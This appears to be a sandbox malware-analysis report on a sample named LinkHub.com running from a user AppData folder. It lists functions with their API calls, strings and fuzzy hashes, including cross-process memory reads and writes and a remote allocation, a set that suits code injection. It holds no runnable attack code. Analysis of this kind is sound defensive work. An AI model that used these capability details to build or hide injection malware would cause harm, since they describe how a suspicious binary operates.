Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 1e817c4736b2232fe45d8ae55026e6241ebfd0b6a64eafde816c750da9c773d1
Instruction ID: 84c62b3dc328068c8778422163cc06e5df3aea057ae6e7d137fe47869484b12b
Opcode Fuzzy Hash: 1e817c4736b2232fe45d8ae55026e6241ebfd0b6a64eafde816c750da9c773d1
Instruction Fuzzy Hash: 68019C72810B15DFCB31AFA6D980816FAF9FE602153158A7FD1AA52921C7B0A958DE80

Function 00B665AB Relevance: 7.5, APIs: 5, Instructions: 40windowtimeCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003E9), ref: 00B665BF
GetWindowTextW.USER32(00000000,?,00000100), ref: 00B665D6
MessageBeep.USER32(00000000), ref: 00B665EE
KillTimer.USER32(?,0000040A), ref: 00B6660A
EndDialog.USER32(?,00000001), ref: 00B66624

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: BeepDialogItemKillMessageTextTimerWindow
String ID:
API String ID: 3741023627-0
Opcode ID: 5d6ff68536a094c8013ea6816d2db0cc429a61cb9e7833bc4cf9a56cd837bebd
Instruction ID: b871a17fbeb250536a04037c51d14abdcc357bf1a802b77ce9ee009913b47fc8
Opcode Fuzzy Hash: 5d6ff68536a094c8013ea6816d2db0cc429a61cb9e7833bc4cf9a56cd837bebd
Instruction Fuzzy Hash: 10013631500704ABEB215F11EE4EB967BB8FB14705F00459AA587A20E1DFF4AA548A94

Function 00B3DABA Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00B3DAD2

Part of subcall function 00B32D38: RtlFreeHeap.NTDLL(00000000,00000000,?,00B3DB51,?,00000000,?,00000000,?,00B3DB78,?,00000007,?,?,00B3DF75,?), ref: 00B32D4E
Part of subcall function 00B32D38: GetLastError.KERNEL32(?,?,00B3DB51,?,00000000,?,00000000,?,00B3DB78,?,00000007,?,?,00B3DF75,?,?), ref: 00B32D60

_free.LIBCMT ref: 00B3DAE4
_free.LIBCMT ref: 00B3DAF6
_free.LIBCMT ref: 00B3DB08
_free.LIBCMT ref: 00B3DB1A

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 3ef6207eaba0f8956a9135097a93e8a14bfb34a557500bbb9aa0632535f3c0e1
Instruction ID: 5e8606426029132e3500baab616ac3c7ef555967d23a7a1afc27f9ea6598933d
Opcode Fuzzy Hash: 3ef6207eaba0f8956a9135097a93e8a14bfb34a557500bbb9aa0632535f3c0e1
Instruction Fuzzy Hash: 82F0B776545604ABC624EB68F986D1AB7EDEE08710BB50CE9F149D7551CB30FC808A64

Function 00B32610 Relevance: 7.5, APIs: 5, Instructions: 30COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00B3262E

Part of subcall function 00B32D38: RtlFreeHeap.NTDLL(00000000,00000000,?,00B3DB51,?,00000000,?,00000000,?,00B3DB78,?,00000007,?,?,00B3DF75,?), ref: 00B32D4E
Part of subcall function 00B32D38: GetLastError.KERNEL32(?,?,00B3DB51,?,00000000,?,00000000,?,00B3DB78,?,00000007,?,?,00B3DF75,?,?), ref: 00B32D60

_free.LIBCMT ref: 00B32640
_free.LIBCMT ref: 00B32653
_free.LIBCMT ref: 00B32664
_free.LIBCMT ref: 00B32675

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 3d230fd0944ff69ae20efea7c3dfb00d8e12588736b6bf1d6527fc53fd6e078d
Instruction ID: 5f02a0706c756db90a27252ee60d81f69c5b3ecc9e37460ce8cc904dd2e94043
Opcode Fuzzy Hash: 3d230fd0944ff69ae20efea7c3dfb00d8e12588736b6bf1d6527fc53fd6e078d
Instruction Fuzzy Hash: 60F0DAB98031209B8602AF58FC12848BBE4FB2875175509ABF51497275EF310901AF94

Function 00B312B7 Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 389COMMONLIBRARYCODE

Download Yara Rule

APIs

__freea.LIBCMT ref: 00B31469
__freea.LIBCMT ref: 00B31487

Part of subcall function 00B318A7: _free.LIBCMT ref: 00B318BF

Strings

a/p, xrefs: 00B3154E
am/pm, xrefs: 00B314EA

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: __freea$_free
String ID: a/p$am/pm
API String ID: 3432400110-3206640213
Opcode ID: 5774044f6b1ff0ac550929c568e87c4c56f0873f110353527bef0a173a7d22b6
Instruction ID: 5b390b400a615cc0ff90d5864692d657231d18bfaaeeec4b3dfe805051f6f2ee
Opcode Fuzzy Hash: 5774044f6b1ff0ac550929c568e87c4c56f0873f110353527bef0a173a7d22b6
Instruction Fuzzy Hash: 7CD1F175910206DBCB249FACC8967BAB7F9FF15700F3949DAE902AB250D7359D40CBA0

Function 00B63063 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00B6BDCA: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00B62B1D,?,?,00000034,00000800,?,00000034), ref: 00B6BDF4

SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00B630AD

Part of subcall function 00B6BD95: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00B62B4C,?,?,00000800,?,00001073,00000000,?,?), ref: 00B6BDBF

Part of subcall function 00B6BCF1: GetWindowThreadProcessId.USER32(?,?), ref: 00B6BD1C
Part of subcall function 00B6BCF1: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00B62AE1,00000034,?,?,00001004,00000000,00000000), ref: 00B6BD2C
Part of subcall function 00B6BCF1: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00B62AE1,00000034,?,?,00001004,00000000,00000000), ref: 00B6BD42

SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00B6311A
SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00B63167

Strings

@, xrefs: 00B6317F

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
String ID: @
API String ID: 4150878124-2766056989
Opcode ID: 940412660c94c268b4ee2cd7168553ba7945352c35527a665d239e135de2de0e
Instruction ID: 50b941e1bc18d71fe9ae71bf2a1bf4bcea9ee1bcea39aff7861645a3ec59e143
Opcode Fuzzy Hash: 940412660c94c268b4ee2cd7168553ba7945352c35527a665d239e135de2de0e
Instruction Fuzzy Hash: 09411872900218AEDB10DFA4CD85EDEBBF8EF49700F0040A5EA45BB181DB746F85CB60

Function 00B31A9E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 115COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com,00000104), ref: 00B31AD9
_free.LIBCMT ref: 00B31BA4
_free.LIBCMT ref: 00B31BAE

Strings

C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com, xrefs: 00B31AD0, 00B31AD7, 00B31B06, 00B31B3E

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: _free$FileModuleName
String ID: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com
API String ID: 2506810119-1604394757
Opcode ID: 5ddd9fdf2c372eda8487ded452aeee366d22b3787f0c14c535c8e503e8f01e33
Instruction ID: b064ec0432851422f9da24a3ac73f12b522408d204fcbff99332b611c6601110
Opcode Fuzzy Hash: 5ddd9fdf2c372eda8487ded452aeee366d22b3787f0c14c535c8e503e8f01e33
Instruction Fuzzy Hash: 03315A71A05258ABCB21DF99DC85D9EFBFCEB95750F2045E6F81497221FA708E40CBA0

Function 00B6CB28 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 114windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00B6CBB1
DeleteMenu.USER32(?,00000007,00000000), ref: 00B6CBF7
DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00BD29C0,014D54D0), ref: 00B6CC40

Strings

0, xrefs: 00B6CB8A

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: Menu$Delete$InfoItem
String ID: 0
API String ID: 135850232-4108050209
Opcode ID: c29b5793eff2b96a798302a2359a74c6e5ac9d28caad8f13f3c0526fe284490f
Instruction ID: a3134973ab8e0cf768396f0e56d3e06b13cddfc20b4f29d2954e97275ed4cea5
Opcode Fuzzy Hash: c29b5793eff2b96a798302a2359a74c6e5ac9d28caad8f13f3c0526fe284490f
Instruction Fuzzy Hash: 8B41B3312043019FD720DF25D985B2ABFE4FF84714F144AADF4A997291DB38E904CB92

Function 00B94EB4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 106COMMON

Download Yara Rule

APIs

SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00B9DCD0,00000000,?,?,?,?), ref: 00B94F48
GetWindowLongW.USER32 ref: 00B94F65
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00B94F75

Strings

SysTreeView32, xrefs: 00B94F1A

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: Window$Long
String ID: SysTreeView32
API String ID: 847901565-1698111956
Opcode ID: 649c17fadad10d38ac410eaad620e3c08b0208586e2d9d5cd6db0f1f1c262dcf
Instruction ID: f839a50456f56629ce6a1a8f147783525996fab6175ab12e496f78095f9e6862
Opcode Fuzzy Hash: 649c17fadad10d38ac410eaad620e3c08b0208586e2d9d5cd6db0f1f1c262dcf
Instruction Fuzzy Hash: 8D317C31214606AFDF258F78CC45FEA7BE9EB09324F204765F979A21E0DB70AC519B50

Function 00B83AAB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00B83DB8: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,00B83AD4,?,?), ref: 00B83DD5

inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00B83AD7
_wcslen.LIBCMT ref: 00B83AF8
htons.WSOCK32(00000000,?,?,00000000), ref: 00B83B63

Strings

255.255.255.255, xrefs: 00B83AF2, 00B83AF7

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: ByteCharMultiWide_wcslenhtonsinet_addr
String ID: 255.255.255.255
API String ID: 946324512-2422070025
Opcode ID: 819815b09b2aeca3daa92c8668418149707ae5d2106e0cb93722c0250445f738
Instruction ID: 0de0ef4bc7a67d538e9f748d9809e880edfe193c64c9bd2fc56c19e5a3a48dac
Opcode Fuzzy Hash: 819815b09b2aeca3daa92c8668418149707ae5d2106e0cb93722c0250445f738
Instruction Fuzzy Hash: CF31B575600201DFCB10EF68C5C5EA977E1EF15B14F2485D9E8168B3A2D771EE45C760

Function 00B94954 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 89windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00B949DC
SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00B949F0
SendMessageW.USER32(?,00001002,00000000,?), ref: 00B94A14

Strings

SysMonthCal32, xrefs: 00B949A7

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: MessageSend$Window
String ID: SysMonthCal32
API String ID: 2326795674-1439706946
Opcode ID: 56953c79776ddf4ff8b1feef5bd24a4a2bc7448bcabc9c942b5b6932e113f699
Instruction ID: 662eb847c0829a55a2605315ada1b87e7f5a9b0915edac8316943e3085faf340
Opcode Fuzzy Hash: 56953c79776ddf4ff8b1feef5bd24a4a2bc7448bcabc9c942b5b6932e113f699
Instruction Fuzzy Hash: 0F21BF32610219AFDF118F94DC42FEB3BA9EF48718F110264FA156B1D0DAB5AC52DBA0

Function 00B950F1 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 87windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00B951A3
SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00B951B1
DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00B951B8

Strings

msctls_updown32, xrefs: 00B95122

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: MessageSend$DestroyWindow
String ID: msctls_updown32
API String ID: 4014797782-2298589950
Opcode ID: 5b7efb92c1216e9da0a11b01852ed6bb7f276439f8f0b000e85dd5459e75ad0c
Instruction ID: 3010e17acbe723aae3724f5f200e93c42785690252a50406998dcd0f9062f1f2
Opcode Fuzzy Hash: 5b7efb92c1216e9da0a11b01852ed6bb7f276439f8f0b000e85dd5459e75ad0c
Instruction Fuzzy Hash: C42190B5600659AFDB11DF24DC91EA777EDEB5A364B0400A9F9009B3A1CB30EC01CBA0

Function 00B94253 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00B942DC
SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00B942EC
MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00B94312

Strings

Listbox, xrefs: 00B942AB

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: MessageSend$MoveWindow
String ID: Listbox
API String ID: 3315199576-2633736733
Opcode ID: f0bf091d80f6cf8d21f62ba6f4a7939844b52d402501e4b846fd434faac56fcf
Instruction ID: f240210e384ba0172a24e4dc796c29f689667f743e920e48455f2a65f7585525
Opcode Fuzzy Hash: f0bf091d80f6cf8d21f62ba6f4a7939844b52d402501e4b846fd434faac56fcf
Instruction Fuzzy Hash: 71219232614218BBEF118FA4DC85FBB3BAEEF89754F118165F9019B190CB71DC5287A0

Function 00B75439 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00B7544D
GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00B754A1
SetErrorMode.KERNEL32(00000000,?,?,00B9DCD0), ref: 00B75515

Strings

%lu, xrefs: 00B754B4

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: ErrorMode$InformationVolume
String ID: %lu
API String ID: 2507767853-685833217
Opcode ID: 2ecb29d8efda5c3556cf5d886f96d298a1f170dcaefa30c469014d05d5f4dabd
Instruction ID: bf948e0c5eda2e638e8b763e0b13164075130bb33f5dc4ca3492340293321285
Opcode Fuzzy Hash: 2ecb29d8efda5c3556cf5d886f96d298a1f170dcaefa30c469014d05d5f4dabd
Instruction Fuzzy Hash: 2D314175A00109AFDB10DF64C985EAA7BF8EF05304F1480E9F509DB262DB71EE45DB61

Function 00B94C89 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00B94CED
SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00B94D02
SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00B94D0F

Strings

msctls_trackbar32, xrefs: 00B94CC4

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: MessageSend
String ID: msctls_trackbar32
API String ID: 3850602802-1010561917
Opcode ID: dc05c3ce36a13409bc2933b7a3b5993dfe50944bdb715ca7445d6166ff42284b
Instruction ID: 4150672a621a97df8e8d89748848765e8dd44d885e2b8a38be7edb77579e1857
Opcode Fuzzy Hash: dc05c3ce36a13409bc2933b7a3b5993dfe50944bdb715ca7445d6166ff42284b
Instruction Fuzzy Hash: B3110271240248BEEF205F69CC06FAB7BE8EF89B64F114525FA51E21A0D672DC51DB20

Function 00B6389E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00B08577: _wcslen.LIBCMT ref: 00B0858A

Part of subcall function 00B636F4: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00B63712
Part of subcall function 00B636F4: GetWindowThreadProcessId.USER32(?,00000000), ref: 00B63723
Part of subcall function 00B636F4: GetCurrentThreadId.KERNEL32 ref: 00B6372A
Part of subcall function 00B636F4: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00B63731

GetFocus.USER32 ref: 00B638C4

Part of subcall function 00B6373B: GetParent.USER32(00000000), ref: 00B63746

GetClassNameW.USER32(?,?,00000100), ref: 00B6390F
EnumChildWindows.USER32(?,00B63987), ref: 00B63937

Strings

%s%d, xrefs: 00B6394B

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
String ID: %s%d
API String ID: 1272988791-1110647743
Opcode ID: 4d155c850064e0fc1f845e6d63bb51c609b4718596951dc6b5e86235340907b6
Instruction ID: 38a378b45960b5f64f69104c4b5be62a0871b6d3d3b70eca71b692e36447318c
Opcode Fuzzy Hash: 4d155c850064e0fc1f845e6d63bb51c609b4718596951dc6b5e86235340907b6
Instruction Fuzzy Hash: 191190716002056BCF11AF749D85AED77EAAF98704F0480A9F9499B292DE759A05CB20

Function 00B96321 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 00B96360
SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 00B9638D
DrawMenuBar.USER32(?), ref: 00B9639C

Strings

0, xrefs: 00B9632E

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
